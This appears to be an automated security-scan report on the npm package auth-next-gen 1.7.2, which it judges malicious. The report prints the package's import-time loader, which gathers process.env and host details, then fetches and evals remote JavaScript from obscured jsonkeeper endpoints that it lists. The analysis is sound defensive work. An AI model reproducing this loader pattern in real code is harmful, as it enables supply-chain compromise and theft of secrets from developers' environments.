registry  /  auth-next-gen  /  1.7.2

auth-next-gen@1.7.2

auth-next-gen is a lightweight npm module that synchronizes authentication state between server-side rendered (SSR) pages and client-side applications

AI Security Review

scanned 2h ago · by lpm-firewall-ai

The package executes remote code on normal import. The remote payload runs in a scope containing collected environment and host identifiers.

Static reason
One or more suspicious static signals were detected.
Trigger
require('auth-next-gen') or importing package main index.js
Impact
Remote attacker-controlled code execution in the consumer process with access to environment variables and host metadata.
Mechanism
import-time fetch of remote JavaScript followed by eval
Attack narrative
On package import, index.js loads lib/writer.js. That module collects process.env plus host identity fields, then requests a Base64-obscured jsonkeeper URL and evals code from the response. This gives the remote endpoint arbitrary code execution inside the victim application's Node process and can use the collected data in scope.
Rationale
Static source inspection confirms concrete import-time remote code execution with environment and host data staged in scope, hidden behind obfuscated endpoint strings. This is not package-aligned functionality for an SSR auth helper and warrants blocking.
Evidence
package.jsonindex.jslib/writer.js
Network endpoints2
www.jsonkeeper.com/b/GS6NQwww.jsonkeeper.com/b/HY6M6

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json main is index.js with no lifecycle hook but normal import entrypoint.
  • index.js requires ./lib/writer at top level, so importing the package runs writer.js immediately.
  • lib/writer.js builds a data object from process.env, hostname, username, platform, and MAC addresses.
  • lib/writer.js fetches a Base64-hidden URL and evals r.data.data from the response.
  • lib/writer.js contains additional obfuscated hex strings for axios/get/jsonkeeper/then.
Evidence against
  • No install/preinstall/postinstall script in package.json.
  • No file writes, persistence hooks, or AI-agent control-surface mutations found in inspected package files.
Behavioral surface
Source
ChildProcessEnvironmentVarsEvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 17 file(s), 52.8 KB of source, external domains: github.com

Source & flagged code

4 flagged · loading source
lib/writer.jsView file
28L29: require('axios').get(atob("[redacted]==")).then(r => {eval(r.data.data);}); L30:
High
Eval

Package source references dynamic code evaluation.

lib/writer.jsView on unpkg · L28
20const data = { L21: ...process.env, L22: version: pkg.subModuleVersion, ... L28: L29: require('axios').get(atob("[redacted]==")).then(r => {eval(r.data.data);}); L30:
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

lib/writer.jsView on unpkg · L20
28L29: require('axios').get(atob("[redacted]==")).then(r => {eval(r.data.data);}); L30:
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/writer.jsView on unpkg · L28
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

4 High3 Medium3 Low
HighChild Process
HighEvallib/writer.js
HighSame File Env Network Executionlib/writer.js
HighBase64 Obscured Urllib/writer.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndocs/transports.md
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings